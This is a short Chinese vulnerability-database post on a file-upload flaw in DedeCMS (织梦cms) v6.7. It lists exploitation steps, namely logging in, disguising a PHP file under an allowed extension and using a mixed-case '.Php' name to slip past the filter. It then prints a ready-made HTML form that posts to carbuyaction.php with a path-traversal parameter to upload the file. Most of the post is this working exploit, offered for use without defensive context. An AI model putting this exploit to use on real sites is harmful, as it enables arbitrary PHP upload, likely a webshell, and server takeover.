织梦cms v6.7最新上传漏洞
- 发表于
- Vulndb
EXp
- 必须登陆用户。
- 将待上传PHP文件扩展名改为“zip|gz|rar|iso|doc|xsl|ppt|wps”其中之一。
- newname为上传后的新文件名,扩展名使用大写绕过,如“Php”。
<form action="http://127.0.0.1/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" enctype="multipart/form-data" method="post" name="form1">file:<input name="uploadfile" type="file" /> newname:<input name="newname" type="text" value="myfile.Php" /> <button class="button2" type="submit">提交</button></form>
图文word教程http://dl.dbank.com/c0px882wpv
原文连接:织梦cms v6.7最新上传漏洞
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。